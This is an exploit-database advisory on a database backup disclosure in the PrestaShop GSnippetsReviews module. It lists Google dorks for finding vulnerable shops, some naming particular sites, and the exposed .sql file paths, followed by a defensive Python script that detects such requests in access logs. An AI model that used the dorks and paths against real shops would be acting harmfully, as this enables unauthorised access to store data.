PrestaShop Google GSnippetsReviews 1.6.1.4 Database Disclosure

The PrestaShop Google GSnippetsReviews module version 1.6.1.4 suffers from a database disclosure vulnerability.


MD5 | adcf3a70015372a8abe1b2db0c8a21f0

####################################################################

# Exploit Title : PrestaShop Google GSnippetsReviews Modules 1.6.1.4 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 24/12/2018
# Vendor Homepage : prestashop.com
# Software Download Link :
addons.prestashop.com/en/seo-natural-search-engine-optimization/6144-customer-ratings-and-reviews-pro-google-rich-snippets.html
+ sourceforge.net/projects/prestashopratingreview/
+ codecanyon.net/item/prestashop-products-review-google-rich-snippets-module/20545945
+ storeprestamodules.com/prestashop-modules-google-snippets-product-reviews.html
# Software Price : 100 Euro
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.4.11.0± - 1.4.7.0 - 1.4.6.2 - 1.5.4.0 - 1.5.6.1 - 1.5.6.2 - 1.5.3.1 - 1.6.0.12± - 1.6.1.1± - 1.6.1.4±
# Exploit Risk : Medium
# Google Dorks : inurl:''/modules/gsnippetsreviews/sql/''
intext:''© 2013 - Vinta Quatre. Tous droits réservés - Création Yellow Agence Internet''
intext:''© 2018 - DECO LED VLC''
intext:''Powered by e-com''
intext:''© 2018 Sud Corner tous droits réservés''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]

####################################################################

# Exploit :

/modules/gsnippetsreviews/sql/install.sql

/modules/gsnippetsreviews/sql/uninstall.sql

/modules/gsnippetsreviews/sql/update-date-rating.sql

/modules/gsnippetsreviews/sql/update-lang-review.sql

/modules/gsnippetsreviews/sql/update-voucher-fb.sql
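
The files listed above are static, so each request for one is recorded in the web server's access log. The following Python is an added example, not part of the original advisory: it scans log lines for requests to `.sql` files in a module's `sql/` directory and separates those the server actually returned from those it refused. It generalizes from gsnippetsreviews to any module name; the Combined Log Format, the function name `find_sql_exposure` and the sample log lines are assumptions made for the example.

```python
import re
from urllib.parse import unquote

# Combined Log Format: ip ident user [time] "METHOD path PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
# A .sql file in any module's sql/ directory; search() also matches shops
# installed in a sub-directory (for example /shop/modules/...).
SQL_RE = re.compile(r'/modules/(?P<module>[^/]+)/sql/(?P<file>[^/]+\.sql)$', re.I)

def find_sql_exposure(lines):
    """Split requests for module .sql files into (served, probed).

    served: the server returned the file (2xx or 304), so it is exposed.
    probed: the request was refused or the file is absent (other statuses).
    """
    served, probed = [], []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        # Drop the query string, decode %xx escapes, collapse repeated slashes.
        path = re.sub(r'/+', '/', unquote(m['path'].split('?', 1)[0]))
        hit = SQL_RE.search(path)
        if not hit:
            continue
        status = int(m['status'])
        rec = {'ip': m['ip'], 'time': m['time'], 'status': status,
               'module': hit['module'], 'file': hit['file']}
        (served if 200 <= status < 300 or status == 304 else probed).append(rec)
    return served, probed

# Constructed sample log lines (documentation-range addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [24/Dec/2018:10:01:02 +0000] "GET /modules/gsnippetsreviews/sql/install.sql HTTP/1.1" 200 4312 "-" "curl/7.61"',
    '203.0.113.7 - - [24/Dec/2018:10:01:03 +0000] "GET /modules/gsnippetsreviews/sql/uninstall.sql HTTP/1.1" 403 199 "-" "curl/7.61"',
    '198.51.100.4 - - [24/Dec/2018:10:02:00 +0000] "GET /shop/modules/gsnippetsreviews/sql/update%2Ddate-rating.sql?x=1 HTTP/1.1" 200 120 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [24/Dec/2018:10:03:00 +0000] "GET /index.php?id_product=3 HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    served, probed = find_sql_exposure(SAMPLE_LOG)
    for r in served:
        print('EXPOSED', r['time'], r['ip'], r['module'], r['file'], r['status'])
    for r in probed:
        print('probe  ', r['time'], r['ip'], r['module'], r['file'], r['status'])
```

Any entry in `served` means the web server is handing out the module's SQL scripts and access to that directory should be denied at the server level; entries in `probed` show the path is being requested even though it is blocked or absent.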

###################################################################

# Example Vulnerable Sites =>

####################################################################

# Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################
